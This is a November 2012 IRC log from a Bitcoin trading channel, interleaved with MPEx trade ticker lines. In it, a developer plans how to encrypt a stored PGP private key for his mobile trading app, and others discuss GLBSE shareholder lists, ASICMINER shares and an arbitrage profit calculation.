mod6 is not online. Nov 21 00:21:50 /msg nickserv ghost mod6 Nov 21 00:21:52 then release it Nov 21 00:21:55 then you can nick Nov 21 00:23:05 weird Nov 21 00:23:06 (14:22) -NickServ(NickServ@services.)- mod6 is not online. Nov 21 00:23:14 ok, i'll just disconnect and reconnect. Nov 21 00:23:15 weird Nov 21 00:23:23 i totally didn't even know I wasn't auth'd then boom Nov 21 00:23:33 im like Guest696969 Nov 21 00:27:43 ;;rate mircea_popescu 4 "has coolest btc enterprise and is really helpful" Nov 21 00:27:44 Rating entry successful. Your rating of 4 for user mircea_popescu has been recorded. Nov 21 00:28:03 i completely forgot i didn't rate you yet Nov 21 00:30:16 o hey. cool :D Nov 21 00:31:27 yeah, its all good. i forgot about the nickserv 'release' command Nov 21 00:31:30 heheheh Nov 21 00:32:07 wb :p Nov 21 00:33:02 :D thx! Nov 21 00:33:23 it was like, your 30 seconds are up mod6. *BLOOOOOP* Nov 21 00:35:12 im glad some of us are good this irc thing Nov 21 00:35:46 [MPEX] [S.MPOE] 19750 @ 0.00050281 = 9.9305 BTC [-] Nov 21 00:35:48 [MPEX] [S.MPOE] 126 @ 0.000503 = 0.0634 BTC [+] Nov 21 00:35:51 i was like, "Ummmm" Nov 21 00:36:15 RELEASE MY NICK?! WAIT DID SOMEONE TRY TO HAXoR ME?! Nov 21 00:36:31 funny Nov 21 00:37:51 mircea_popescu: still no word from rg/grubles Nov 21 00:37:57 OH Nov 21 00:38:23 smickles hm. Nov 21 00:38:58 err, nm... anyway. I also made a #BitOTTer channel for technical discussion Nov 21 00:39:16 i figure, it'll keep my spam out of these trade channels :] Nov 21 00:42:38 how;s it coming along ? Nov 21 00:43:10 well, i've been workin on it quite a bit. Nov 21 00:43:26 kinda not so ciked about the way this KeyStore thing is working out Nov 21 00:44:33 or at least, its been a bit harder than I expected. i've done a bunch and it now creates a keystore (or loads an existing one) Nov 21 00:45:06 [MPEX] [O.BTCUSD.C120T] 2 @ 0.12 = 0.24 BTC [-] Nov 21 00:45:21 basically takes a PublicKey and PrivateKey and stores them in a KeyPair object, when then can be used to create an X509 cert that can be then inserted and extracted from the KeyStore itself. Nov 21 00:46:07 [MPEX] [O.BTCUSD.P120T] 31 @ 0.09208812 = 2.8547 BTC [-] Nov 21 00:46:36 [MPEX] [S.MPOE] 3579 @ 0.000503 = 1.8002 BTC [+] Nov 21 00:46:37 [MPEX] [S.MPOE] 22072 @ 0.000503 = 11.1022 BTC [+] Nov 21 00:46:38 [MPEX] [S.MPOE] 2649 @ 0.00050303 = 1.3325 BTC [+] Nov 21 00:47:02 anyway... its all technical stuff basically but... im having a hard time getting the private key back out for use Nov 21 00:47:18 i c Nov 21 00:47:33 many examples show how to makes this work, but not anylonger because the main way to do this is now deprecated Nov 21 00:47:37 lol, joke is on mod6 Nov 21 00:48:46 so... im kinda thinking, this is way to much effort for just a first release, can I not just use a symmetric key algo to enc the privkey on the local filestore? Nov 21 00:49:21 then just decrypt into memory when needed, but never writing it to disk. Nov 21 00:50:33 what is this about? Nov 21 00:50:50 haha, see. its all good kakobreklaaa you don't need to worry. Nov 21 00:50:59 just some technical bs about my bikeshed Nov 21 00:51:41 https://bitcointalk.org/index.php?topic=127007.0 looky! another one! Nov 21 00:51:56 anyone wants to bet there will be > 100 new btc/fiat exchange websites in 2013? Nov 21 00:52:33 mod6 i guess you could, as long as the user knows about this. Nov 21 00:52:47 heck, the original wallet.dat was plaintext for > 1 year. Nov 21 00:53:39 mod6, bitcoinspinner does not encrypt the keys at all Nov 21 00:54:05 right on. no matter what happens, I'll make sure the PrivateKey ring file will be protected Nov 21 00:54:51 and upon pointed to it, Jan proposed to have two keys on paper backup and alternate them Nov 21 00:54:55 jurov: hmm! i didn't know that. they really should be just to save a guy if his device gets stolen or hacked. Nov 21 00:55:49 [MPEX] [S.MPOE] 12251 @ 0.00050303 = 6.1626 BTC [+] Nov 21 00:55:50 [MPEX] [S.MPOE] 21349 @ 0.00050304 = 10.7394 BTC [+] Nov 21 00:55:56 I wanna make sure that if anyone uses BitOTTer that they know their key they put on the device is safe at lesat if the device is stolen or hacked Nov 21 00:56:07 i started to be interested cause my phone got back from warranty prepair with completely replaced mobo Nov 21 00:56:13 *repair Nov 21 00:56:34 i have a screen now where the user goes in and sets the private key for the KeyStore, etc. but now I think I'm just gonna make that be the symmetric key for like AES or something Nov 21 00:57:39 i've already got a java one written actually. heck, its even open source. Nov 21 00:59:28 everything will be well documented in BitOTTer so the users will know what they are setting and what stuff means in the application Nov 21 00:59:45 this will take some time, but I want to get this into the hands of a few people who'd like to test it before the end of the year. Nov 21 01:00:12 its really getting close. i don't wanna let this damn keystore hold me back when I can just use something else. Nov 21 01:00:45 anyway guys, I gotta run along to something else quick. i'll try to save the elaborations on that for #BitOTTer in the future. thx. Nov 21 01:04:58 [MPEX] [S.MPOE] 16901 @ 0.00050304 = 8.5019 BTC [+] Nov 21 01:04:59 [MPEX] [S.MPOE] 34556 @ 0.00050312 = 17.3858 BTC [+] Nov 21 01:05:53 and upon pointed to it, Jan proposed to have two keys on paper backup and alternate them << lol that one's good Nov 21 01:16:04 ok. to be a bit more spacific, and the documentation will reflect this... i'll encrypt the private key on the local file store. Nov 21 01:17:03 the users PGP PublicKey and MPEx PublicKey can stay as they are. no need to do anything with those at all. Nov 21 01:17:58 the code can read them in either keyring format or ascii armor'd output format Nov 21 01:18:12 base64 Nov 21 01:18:23 well ya public ketys are publioc Nov 21 01:18:49 yeah, im not sure whatever Jan or whomever was talking about. just want to be clear about that I'm doing :) Nov 21 01:20:44 here: https://bitcointalk.org/index.php?topic=53353.msg1343738#msg1343738 Nov 21 01:22:30 hmmm... well, this wont be a 6 digit pin like that Nov 21 01:24:16 what I was thinking about using is currently a class that implements 256bit AES Nov 21 01:25:01 use that... maybe in a future release i can get the keystore thing working better, or change it so the user might be able to select from a variety of different algos to use Nov 21 01:25:49 you want to improve over gpg passphrase? how? Nov 21 01:26:05 huh? i think we misunderstand eachother Nov 21 01:26:44 i don't want to replace the gpg passphrase... im saying that the user can set a seperate passphrase to encrypt the unencrypted privatekey file on the filestore Nov 21 01:27:23 you may find useful to look into KeePass code than Nov 21 01:27:29 then when the user goes to trade, they'll need to enter their passphrase to decrypt the encrypted private key stored on the file system so the application can decipher the return tx statements from mpex Nov 21 01:28:30 jurov i think maybe what he means is, have a sluttysally and a properpolly code. Nov 21 01:28:47 you usually keep the slut loaded, but periodically load the safe one and move coins there Nov 21 01:29:00 im using spongy castle to read in the PGP keys, I then have to convert them to be able to use them outside of its context, it gets hairy Nov 21 01:29:02 sorta like an awkward cold/hot wallet arrangement Nov 21 01:30:42 yeah, in this situation that im setting up for the user, the user will have to do this: 1) copy the 3 pgp keys onto the device Nov 21 01:31:07 2) start BitOTTer and enter the path's to the keys. Nov 21 01:31:16 [MPEX] [S.MPOE] 16838 @ 0.00050312 = 8.4715 BTC [+] Nov 21 01:31:16 [MPEX] [S.MPOE] 18162 @ 0.00050313 = 9.1378 BTC [+] Nov 21 01:31:28 3) set the seperate password for the private key Nov 21 01:31:54 3a) encrypt private key and save output to localfile store Nov 21 01:32:31 [MPEX] [S.MPOE] 22238 @ 0.00050313 = 11.1886 BTC [+] Nov 21 01:32:33 [MPEX] [S.MPOE] 9712 @ 0.00050314 = 4.8865 BTC [+] Nov 21 01:32:33 4) notify the user to delete unencrypted private key file Nov 21 01:32:47 or the user could do it if so desired Nov 21 01:33:27 i could write that in also... anyway. then the key will be safe... at least it'll be encrypted if the device is hacked/stolen Nov 21 01:33:46 that means two mpex accts? Nov 21 01:33:54 and then you can say, "THANKS MOD6!" instead of "FUUUUUUUUU MOD6!" Nov 21 01:34:14 nope. just your 1 regular account. Nov 21 01:34:20 jurov for bitcoinspinner ?! Nov 21 01:34:46 what? we're talking about bitotter now, no? Nov 21 01:34:54 i guess i got confused Nov 21 01:35:16 currently to trade @ mpex you must be able to clearsign,and enrypt a message - decryption is helpful too!! - this requires the 3 keys I was talking about Nov 21 01:35:35 anyway, mod6 : all this effort is not misplaced. I expect as bitcoins catch momentum that iphones/etc will be stolen for the btc content, much like wallets today Nov 21 01:36:01 oh for sure. it'll be risky to probably keep any large amts on a mobile device Nov 21 01:36:34 and your MPEx private key should be vastly important to you -- so trying to give the user a layer of extra protection Nov 21 01:37:33 what i have code for now, and was trying to make work successfully was getting these three keys into a KeyStore for use as needed Nov 21 01:38:01 but... hitting some issues with getting the private key back out -- hopefully I can whip up something different. Nov 21 01:38:31 then put out that alpha release I've been talking about for forever. once that happens, I can get some feed back from all the users and make good changes based upon feeback Nov 21 01:38:42 yes, i appreciate that effort too Nov 21 01:38:56 thanks :] Nov 21 01:39:01 its been a lot of fun coding it. Nov 21 01:39:08 and do you have some business model, too? Nov 21 01:39:42 [MPEX] [S.MPOE] 3618 @ 0.00050314 = 1.8204 BTC [+] Nov 21 01:39:43 [MPEX] [S.MPOE] 14732 @ 0.00050315 = 7.4124 BTC [+] Nov 21 01:39:53 like, paid app with some extras Nov 21 01:40:31 Well, I had been wrestling with this for a while, but what I thought would be a good idea was if people use me for the referal program at MPEx, they can get BitOTTer to download and also save some on the MPEx registration as I'll kick them back 2.5 BTC Nov 21 01:41:25 at least that was what was planned a while ago. I want to kinda get a alpha/beta program going Nov 21 01:42:00 of course, but it's necessary to collect ideas. i'd also suggest scripting ability for paid version Nov 21 01:42:30 hmm. scripting? Nov 21 01:42:40 sounds neat, but i'm not sure how you mean. Nov 21 01:42:57 OH Nov 21 01:43:01 like atomated trades? Nov 21 01:43:11 yes maybe Nov 21 01:43:28 I see... very exciting feature to be implemented for sure. Nov 21 01:43:45 I plan to add charting and graphing and all kinds of neato stuff actually. Nov 21 01:44:09 I honestly hope to turn BitOTTer into a fulltime thing if all goes well. Nov 21 01:44:18 or at least periodic fetching of new transactions and notifying the user Nov 21 01:44:26 oh for sure. Nov 21 01:44:45 im so excited for the JSONSTAT cmd, thats the only other thing I need to implement really. Nov 21 01:44:55 just a screen that displays the results from that Nov 21 01:45:43 and then we have a first release. much more to go from there, but it'll allow a user to trade, send commands and see the VWAP and Depth Nov 21 01:46:29 i'll be stoked to use it from the car, or wherever. have you ever seen an MPEx trade fly by on twitter and wish you were home to but in a bid? lol Nov 21 01:46:44 s/but/put/ Nov 21 01:48:32 thanks for your input jurov Nov 21 01:49:17 i'm gonna run and grab some foodz0r Nov 21 01:49:31 you're welcome. while i just login to coinbr and do stuff, having app would be nice. Nov 21 01:49:33 [MPEX] [S.MPOE] 19600 @ 0.00050309 = 9.8606 BTC [-] Nov 21 01:49:39 :) Nov 21 01:49:46 mod6 in principle having a programmable bot with preset and also configurable strategies could be a nice add-on Nov 21 01:49:51 not alpha material, but eventually. Nov 21 01:50:07 also, accounting for the user. Nov 21 01:50:12 ahh, ok. Nov 21 01:50:36 sure..i see what you're getting at. these are great things, looking forward to talking about that more as the time comes. Nov 21 01:50:57 just letting you know that you're gonna be working on this well into 2015 lol Nov 21 01:51:16 haha, thats awesome. Nov 21 01:51:31 hehe yes.. and don't let your gpg keys expire :P Nov 21 01:51:41 haha, i set mine to expire in ... Nov 21 01:51:44 2014? Nov 21 01:52:13 haha, i'll have to change the expiration or whatever, no big deal Nov 21 01:52:34 i guess in the past i've had other pgp keys, i think they just expired and I made new ones... Nov 21 01:52:35 mod6 very big deal. mpex doesn't read the internets. Nov 21 01:53:04 oh ok, I'll just have to make a new acct then. Nov 21 01:53:10 no worries though. Nov 21 01:53:23 [MPEX] [S.MPOE] 4700 @ 0.00050309 = 2.3645 BTC [-] Nov 21 01:53:25 [MPEX] [S.MPOE] 17068 @ 0.00050315 = 8.5878 BTC [+] Nov 21 01:53:26 [MPEX] [S.MPOE] 30650 @ 0.0005032 = 15.4231 BTC [+] Nov 21 01:53:27 [MPEX] [S.MPOE] 16612 @ 0.00050329 = 8.3607 BTC [+] Nov 21 01:53:46 50btc for a new acct may be a worry for some people Nov 21 01:54:40 but not for us by 2014. i wholeheartedly agree. Nov 21 01:54:44 yeah, mine expires in august of 2014 Nov 21 01:55:05 yeah, to be honest, i actually meant to make a new one like 50x before it went up to 30. Nov 21 01:55:41 i just haven't because i guess i didn't wanna step on my own toes. Nov 21 01:56:00 but my lazyness has cost me 1bn satoshi's Nov 21 01:56:12 DONT LET THIS HAPPEN TO YOU, SIGN UP NAO Nov 21 01:56:43 i better get one tonight and heed my own advice. Nov 21 01:56:45 lol Nov 21 01:56:52 mircea_popescu: don't raise it before later tonight lol Nov 21 01:57:06 ok. Nov 21 01:57:18 ok cool. im gonna get some food. bbl Nov 21 01:57:21 :D Nov 21 02:00:13 [MPEX] [S.MPOE] 17388 @ 0.00050329 = 8.7512 BTC [+] Nov 21 02:00:14 [MPEX] [S.MPOE] 12512 @ 0.00050334 = 6.2978 BTC [+] Nov 21 02:01:02 [MPEX] [S.MPOE] 1660 @ 0.00050334 = 0.8355 BTC [+] Nov 21 02:12:19 [MPEX] [S.MPOE] 29314 @ 0.00050348 = 14.759 BTC [+] Nov 21 02:26:10 https://bitcointalk.org/index.php?topic=25137.msg311962#msg311962 Nov 21 02:26:35 offered in july 2011 for 100 btc, still for sale in nov 2012 for... 100btc Nov 21 02:26:40 take that, inflation. Nov 21 02:27:28 [MPEX] [S.MPOE] 2686 @ 0.00050348 = 1.3523 BTC [+] Nov 21 02:32:45 mircea_popescu: oh? Nov 21 02:34:04 oh Nov 21 02:34:06 its usagi Nov 21 02:34:52 :) Nov 21 02:46:58 okay so Nov 21 02:47:07 apparently basic will ship soon Nov 21 02:48:26 I wonder if I can buy one Nov 21 03:00:16 mircea_popescu, read my earlier comment? Nov 21 03:01:52 [12:53] So... apparently, nefario started to send out asset lists... Nov 21 03:01:52 [12:57] Mircea, you might actually have to find someone to buy ASICMINER shares from. Nov 21 03:01:52 no Nov 21 03:02:06 friedcat wants to setup an exchange just for his assets Nov 21 03:02:29 so he wont have to FIND them Nov 21 03:08:07 [MPEX] [S.MPOE] 8014 @ 0.00050348 = 4.0349 BTC [+] Nov 21 03:08:09 [MPEX] [S.MPOE] 12086 @ 0.00050347 = 6.0849 BTC [-] Nov 21 03:08:18 Well works too... Nov 21 03:08:56 If shares don't start being traded between people/on an exchange again, I was kissing goodbye to over 1000 Asicminer shares Nov 21 03:09:05 on december the 19th Nov 21 03:10:15 Namjies hehe maybe so. Nov 21 03:10:26 Namjies: er, kissing goodbye? Nov 21 03:10:28 why? Nov 21 03:10:40 the shares dont go away because you cant trade them Nov 21 03:10:50 a debatable point. Nov 21 03:11:04 no I mean friedcat is already honoring them even without the lists Nov 21 03:11:26 I had a contract with Mircea, he borrowed shares Nov 21 03:11:38 Diablo-D3 this is about a private deal, not much to do with friedcat really. Nov 21 03:11:53 oh, so you two just fucked shit up? lol. Nov 21 03:12:28 No, the deal said should shares no longer be tradeable, a token payment of 1 BTC would be offered. Nov 21 03:12:46 It was a clause in the contract. Nov 21 03:13:03 or... Nov 21 03:13:09 about a tenth what they're worth Nov 21 03:13:09 actually it said "discontinued or no longer traded" Nov 21 03:13:25 polimedia.us/bitcoin/mphf.txt you can read it there. Nov 21 03:13:34 Would you like to debate the point right away Mircea? Nov 21 03:14:07 nope. Nov 21 03:14:16 I think you have to wait to see what friedcat is going to do first Nov 21 03:14:19 what's to debate ? just pointed out what the contract said. Nov 21 03:14:31 Aye. Nov 21 03:14:54 okay so, did friedcat do preorders for his shit? or is he just selling them straight? Nov 21 03:15:17 preorders? Nov 21 03:15:35 yes, like bfl and basic and avalon has Nov 21 03:15:51 he did a 200k offering at .1 each dont you remember ? Nov 21 03:16:32 Did he sell the whole 20000 shares to get 200k? Nov 21 03:16:42 200000* Nov 21 03:17:03 Can't remember Nov 21 03:17:21 [MPEX] [S.MPOE] 13854 @ 0.00050347 = 6.9751 BTC [-] Nov 21 03:17:46 iirc it was eventually sold out. Nov 21 03:17:56 Namjies: yes Nov 21 03:18:03 Im not talking the shares here Nov 21 03:18:08 Im talking the actual mining units Nov 21 03:19:06 he was planning to never sekll them Nov 21 03:19:08 just mine Nov 21 03:19:20 thats not true Nov 21 03:19:23 he plans on selling them Nov 21 03:20:40 o ? Nov 21 03:20:57 yes, just not as a full time thing for the first batch Nov 21 03:21:19 It's a mix. Self-mining and selling units. Nov 21 03:21:37 Milkshake. Nov 21 03:21:39 ASICMINER shares get their .10 paid in dividends in full first from all profits. Nov 21 03:21:54 yes Nov 21 03:22:03 but Im still interested in buying units Nov 21 03:22:11 Then it's shared. I don't remember what percentage of the profits the shares actually represent. Nov 21 03:22:11 [MPEX] [S.MPOE] 12550 @ 0.00050344 = 6.3182 BTC [-] Nov 21 03:25:43 half was it ? Nov 21 03:26:12 no, more than half Nov 21 03:30:12 [MPEX] [S.MPOE] 7600 @ 0.00050344 = 3.8261 BTC [-] Nov 21 03:35:57 [MPEX] [S.MPOE] 6805 @ 0.00050344 = 3.4259 BTC [-] Nov 21 03:35:59 [MPEX] [S.MPOE] 6395 @ 0.00050355 = 3.2202 BTC [+] Nov 21 04:05:22 [MPEX] [S.MPOE] 20700 @ 0.00050355 = 10.4235 BTC [+] Nov 21 04:12:48 [MPEX] [S.MPOE] 9255 @ 0.00050355 = 4.6604 BTC [+] Nov 21 04:12:49 [MPEX] [S.MPOE] 5395 @ 0.00050362 = 2.717 BTC [+] Nov 21 04:17:09 http://trilema.com/2012/a-message-to-bitcoin-wanna-be-scammers/ Nov 21 04:17:16 here's one that should prolly be passed around a bit. Nov 21 04:18:58 mircea_popescu: not just pies in face, the SEC are after him Nov 21 04:21:41 [MPEX] [S.MPOE] 35555 @ 0.00050362 = 17.9062 BTC [+] Nov 21 04:21:42 [MPEX] [S.MPOE] 11083 @ 0.00050362 = 5.5816 BTC [+] Nov 21 04:21:48 right. Nov 21 04:22:19 lol, 3rd most view page on my blog... /xmlrpc.php Nov 21 04:22:52 usually the case Nov 21 04:23:29 mircea_popescu: I actually have an interview with the SEC folks coming up next week, I offered to give them any info I have Nov 21 04:25:45 cool. Nov 21 04:26:07 kinda makes the entire point strongert Nov 21 04:26:16 you don't just get pies in the face, you get pies in the ass too. Nov 21 04:26:37 those would be cream pies? Nov 21 04:27:53 yes. mancream. Nov 21 04:37:44 [MPEX] [S.MPOE] 2917 @ 0.00050362 = 1.4691 BTC [+] Nov 21 04:37:45 [MPEX] [S.MPOE] 12550 @ 0.00050365 = 6.3208 BTC [+] Nov 21 04:45:28 hehe Nov 21 04:47:51 math question, if I'm arbitrating bitcoins, and I have a database with all my trades in it (buy and sell) how do I calculate my profits? is it the difference between average rate * total amount on buy and sell orders? Nov 21 04:48:09 well no ? Nov 21 04:48:20 :( Nov 21 04:48:33 balance of your btc position start and end + balance of your fiat position start and end Nov 21 04:48:52 - all you paid for btc added together + all you were paid for btc added togheter Nov 21 04:48:54 [MPEX] [S.MPOE] 27331 @ 0.00050372 = 13.7672 BTC [+] Nov 21 04:48:59 all this in the same currency of account. Nov 21 04:49:15 I don't keep business accounts separate from personal, so that ain't gonna work :P Nov 21 04:49:42 then your averages might give you a rough idea. Nov 21 04:49:50 fun Nov 21 04:49:53 but! Nov 21 04:50:02 you make the averages, substract one from the other Nov 21 04:50:09 then multiply with the smaller of the two volumes Nov 21 04:50:14 yea, that's what I was planning on doing Nov 21 04:50:21 aite. Nov 21 04:50:57 sum(sell_rate)/num(sell_rate) * sell_total_amount - sum(buy_rate)/num(buy_rate) * buy_total_amount Nov 21 04:51:13 was what I was thinking would yield the answer :P Nov 21 04:51:55 tsk. i just said that's not it Nov 21 04:52:05 oh o.O Nov 21 04:52:17 (sum(sell_rate)/num(sell_rate) - sum(buy_rate)/num) * min (buy, sell ammts) Nov 21 04:52:46 I see Nov 21 04:57:18 http://io9.com/5959762/scientists-demonstrate-perfect-invisibility-cloak-in-the-lab Nov 21 04:57:20 holy. Nov 21 04:59:19 [MPEX] [S.MPOE] 10900 @ 0.00050372 = 5.4905 BTC [+] Nov 21 05:01:33 its only microwave invisibility though isnt it ? not visible spectrum ... and only centimetre or less sized items Nov 21 05:01:47 if thats the same article i read ;) Nov 21 05:05:26 [MPEX] [S.MPOE] 8382 @ 0.00050372 = 4.2222 BTC [+] Nov 21 05:05:27 [MPEX] [S.MPOE] 8568 @ 0.0005038 = 4.3166 BTC [+] Nov 21 05:09:26 [MPEX] [S.MPOE] 37100 @ 0.0005038 = 18.691 BTC [+] Nov 21 05:20:46 [MPEX] [S.MPOE] 13450 @ 0.0005038 = 6.7761 BTC [+] Nov 21 05:24:55 MrTiggr yea. Nov 21 05:28:56 [MPEX] [S.MPOE] 982 @ 0.0005038 = 0.4947 BTC [+] Nov 21 05:28:58 [MPEX] [S.MPOE] 27988 @ 0.00050382 = 14.1009 BTC [+] Nov 21 05:28:59 [MPEX] [S.MPOE] 4882 @ 0.00050397 = 2.4604 BTC [+] Nov 21 05:35:37 [MPEX] [S.MPOE] 5237 @ 0.00050397 = 2.6393 BTC [+] Nov 21 05:35:39 [MPEX] [S.MPOE] 8700 @ 0.00050398 = 4.3846 BTC [+] Nov 21 05:35:40 [MPEX] [S.MPOE] 13513 @ 0.00050399 = 6.8104 BTC [+] Nov 21 05:43:32 [MPEX] [S.MPOE] 22287 @ 0.00050399 = 11.2324 BTC [+] Nov 21 05:43:33 [MPEX] [S.MPOE] 14745 @ 0.00050399 = 7.4313 BTC [+] Nov 21 05:50:13 http://blog.smickles.com/society/the-need-to-know-why/ << if you want to read more of my writing Nov 21 05:50:24 [MPEX] [S.MPOE] 17335 @ 0.00050399 = 8.7367 BTC [+] Nov 21 05:55:32 [MPEX] [S.MPOE] 22346 @ 0.00050399 = 11.2622 BTC [+] Nov 21 05:55:34 [MPEX] [S.MPOE] 7704 @ 0.00050404 = 3.8831 BTC [+] Nov 21 06:02:53 [MPEX] [S.MPOE] 17400 @ 0.00050367 = 8.7639 BTC [-] Nov 21 06:17:04 smickles : i got two trackbacks, one from https Nov 21 06:17:13 which has a bad certificate to boot. Nov 21 06:20:16 mircea_popescu: huh, it must do one automatically, and the https i have set up is just for me Nov 21 06:20:29 so i don't broadcast my password in the clear Nov 21 06:20:35 ya well... better look into it maybe ? Nov 21 06:20:46 it's self signed? Nov 21 06:21:17 i sent a track back manually, prolly the https one, i'll refrain in the future ;) Nov 21 06:22:28 hehe it's not signed in any way, it's just a trackback that links to a https address Nov 21 06:22:31 prolly was the manual one. Nov 21 06:22:36 and i'm awaiting moderation!!1 Nov 21 06:23:12 heh, moderated mircea_popescu Nov 21 06:23:38 [MPEX] [S.MPOE] 15731 @ 0.00050401 = 7.9286 BTC [+] Nov 21 06:40:59 mircea_popescu: i can sign and send you the cert to import if you are actually concerned about the state of https on my blog ;) Nov 21 06:43:12 [MPEX] [S.MPOE] 34787 @ 0.00050392 = 17.5299 BTC [-] Nov 21 06:43:13 [MPEX] [S.MPOE] 14713 @ 0.00050394 = 7.4145 BTC [+] Nov 21 06:45:45 ;;google smickles Nov 21 06:45:46 Urban Dictionary: proper smickles: ; Mike Carver (smickles) on Twitter: ; smickles (Michael Carver) · GitHub: Nov 21 06:45:50 [MPEX] [S.MPOE] 2927 @ 0.00050394 = 1.475 BTC [+] Nov 21 06:45:51 [MPEX] [S.MPOE] 11823 @ 0.00050401 = 5.9589 BTC [+] Nov 21 06:45:59 not yet, but front page already Nov 21 06:53:45 lol Nov 21 06:57:44 [MPEX] [S.MPOE] 20896 @ 0.00050401 = 10.5318 BTC [+] Nov 21 06:57:46 [MPEX] [S.MPOE] 3154 @ 0.00050404 = 1.5897 BTC [+] Nov 21 07:00:27 [MPEX] [S.MPOE] 10792 @ 0.00050404 = 5.4396 BTC [+] Nov 21 07:00:28 [MPEX] [S.MPOE] 7108 @ 0.00050405 = 3.5828 BTC [+] Nov 21 07:08:55 [MPEX] [S.MPOE] 1133 @ 0.00050367 = 0.5707 BTC [-] Nov 21 07:10:18 [MPEX] [S.MPOE] 22367 @ 0.00050349 = 11.2616 BTC [-] Nov 21 07:20:41 https://bitcointalk.org/index.php?topic=87094.msg1338178#msg1338178 << day after day of selling out of coins Nov 21 07:24:50 smickles: http://blog.glbse.com/issuers-being-given-shareholder-lists :O Nov 21 07:24:51 woot Nov 21 07:25:23 Azelphur: yeah, good news :) Nov 21 07:25:32 too bad it didn't come much earlier Nov 21 07:25:51 it would've been a lot less drama and bullshit Nov 21 07:26:15 and I don't understand the limit of 3-4 per day Nov 21 07:26:32 me either Nov 21 07:26:38 also, his metric for 'largest assets' is probably wonked Nov 21 07:31:21 true, but at 3-4 a day you can't be too far down the list Nov 21 07:31:25 there isn't exactly that many assets Nov 21 07:31:57 Azelphur: actually, if he's using the same sort that he used to display the full asset list, it'll be well over a week till us Nov 21 07:34:12 [MPEX] [S.MPOE] 14100 @ 0.00050401 = 7.1065 BTC [+] Nov 21 07:45:46 afaik only giga's were released no ? **** BEGIN LOGGING AT Wed Nov 21 13:42:26 2012 Nov 21 13:50:56 Diablo-D3, i like bitstamp Nov 21 13:51:32 http://www.reddit.com/r/Bitcoin/comments/13k4vx/a_message_to_bitcoin_wannabe_scammers/ Nov 21 13:51:35 did not collect statically significant data on reliability, tho :P Nov 21 13:51:43 every1 plz voet!!!one Nov 21 13:52:07 jurov seems pretty much everyone likes bitstamp, unless they fuck up they'll be #2 in short order. Nov 21 13:52:33 *statistically [derp] Nov 21 13:54:02 http://trilema.com/2012/the-circlejerk/ is also reddit-worthy material :D Nov 21 13:54:25 lol Nov 21 13:54:46 the problem i think is if each trilema article ends up there they'll prolly ban me or something Nov 21 13:58:02 hehe... no reason to. Unless all articles were submitted by the same user, which isn't the case. Nov 21 13:58:12 well Nov 21 13:58:22 hrm Nov 21 13:58:25 I dunno Nov 21 13:58:29 I dont want DMC to die, really Nov 21 13:59:03 jurov i'm no expert, jus' sayin'. Nov 21 13:59:18 Diablo-D3 how many glbse assets you figure will get 0 claims ? Nov 21 13:59:32 as in, nobody of the people who sent email of w/e had any shares in them Nov 21 14:00:34 https://bitcointalk.org/index.php?topic=113708.msg1348455#msg1348455 << deprived is pretty much the official usagi body slam community representative. Nov 21 14:10:34 mircea_popescu: who knows Nov 21 14:10:42 btw, is this when I cut off valid claims? Nov 21 14:10:58 like, when I get the list, is that the final defacto list and if you're not on it you're boned? Nov 21 14:11:15 [MPEX] [S.MPOE] 23427 @ 0.00050449 = 11.8187 BTC [-] Nov 21 14:11:16 that question is thorny. Nov 21 14:11:46 i dunno what to say. if you get the list, someone not on it throws a shitfit and claims nefario made a mistake i literally do not know what i'd do. Nov 21 14:11:59 i suppose it's one of those things gigavps is paying counsel for. Nov 21 14:12:46 [MPEX] [S.MPOE] 3323 @ 0.00050449 = 1.6764 BTC [-] Nov 21 14:12:48 [MPEX] [S.MPOE] 32350 @ 0.00050454 = 16.3219 BTC [+] Nov 21 14:12:49 [MPEX] [S.MPOE] 10000 @ 0.00050473 = 5.0473 BTC [+] Nov 21 14:12:50 [MPEX] [S.MPOE] 9537 @ 0.00050484 = 4.8147 BTC [+] Nov 21 14:12:50 yeah, I dont know what to do either Nov 21 14:12:53 because I hired nefario to do a job Nov 21 14:12:55 and he didnt do it Nov 21 14:13:05 and then everyone jumped up my ass on the thread because I said exactly that Nov 21 14:13:38 the contract with glbse was between dmc and glbse, he was paid x btc to register the asset. Nov 21 14:13:54 the moment he closed doors he was in default of that contract Nov 21 14:17:25 well maybe. Nov 21 14:17:41 it's not clear what exactly the contract was, but probably what you say can be claimed as an implicit agreement Nov 21 14:17:53 it'd be a duty of care / fiduciary breach not a contract breach Nov 21 14:18:08 [MPEX] [S.MPOE] 11900 @ 0.000505 = 6.0095 BTC [+] Nov 21 14:18:09 [MPEX] [S.MPOE] 3734 @ 0.00050507 = 1.8859 BTC [+] Nov 21 14:18:11 [MPEX] [S.MPOE] 9316 @ 0.0005051 = 4.7055 BTC [+] Nov 21 14:18:24 mircea_popescu: same difference in the end Nov 21 14:18:36 and I cant sue him because DMC just doesnt have the resources for that Nov 21 14:18:53 Im glad giga scared him straight, none of the rest of us have the money for it Nov 21 14:19:18 tbh : he as far as we know gave "sort-of" a list to giga Nov 21 14:19:20 and nobody else Nov 21 14:19:28 it's been 2-3 days, there's not 12 assets released. Nov 21 14:19:29 so... Nov 21 14:19:40 this may all be premature. not saying it is, just... you know, nefario. Nov 21 14:20:04 yeah =/ Nov 21 14:20:15 I wonder if I should just go start dmc 2.0 and try again Nov 21 14:20:34 just let the dmc 1.0 shit sit in a seperate legal container all by itself Nov 21 14:22:00 I dont know though Nov 21 14:22:15 like, they say when doing the tech startup game, you're supposed to get right back on the horse Nov 21 14:22:17 i guess the bar to attract finance has raised considerably Nov 21 14:26:04 [MPEX] [S.MPOE] 16234 @ 0.0005051 = 8.1998 BTC [+] Nov 21 14:26:06 [MPEX] [S.MPOE] 31151 @ 0.0005051 = 15.7344 BTC [+] Nov 21 14:26:07 [MPEX] [S.MPOE] 7592 @ 0.00050511 = 3.8348 BTC [+] Nov 21 14:27:21 I dont think I want shareholders this time Nov 21 14:29:03 [MPEX] [S.MPOE] 6540 @ 0.00050492 = 3.3022 BTC [-] Nov 21 14:29:04 [MPEX] [S.MPOE] 25300 @ 0.00050412 = 12.7542 BTC [-] Nov 21 14:29:04 well then that's a different story. Nov 21 14:29:05 [MPEX] [S.MPOE] 15700 @ 0.00050405 = 7.9136 BTC [-] Nov 21 14:29:06 [MPEX] [S.MPOE] 17575 @ 0.00050401 = 8.858 BTC [-] Nov 21 14:29:07 [MPEX] [S.MPOE] 22783 @ 0.00050377 = 11.4774 BTC [-] Nov 21 14:29:08 [MPEX] [S.MPOE] 5665 @ 0.0005037 = 2.8535 BTC [-] Nov 21 14:29:09 [MPEX] [S.MPOE] 33750 @ 0.00050347 = 16.9921 BTC [-] Nov 21 14:29:10 [MPEX] 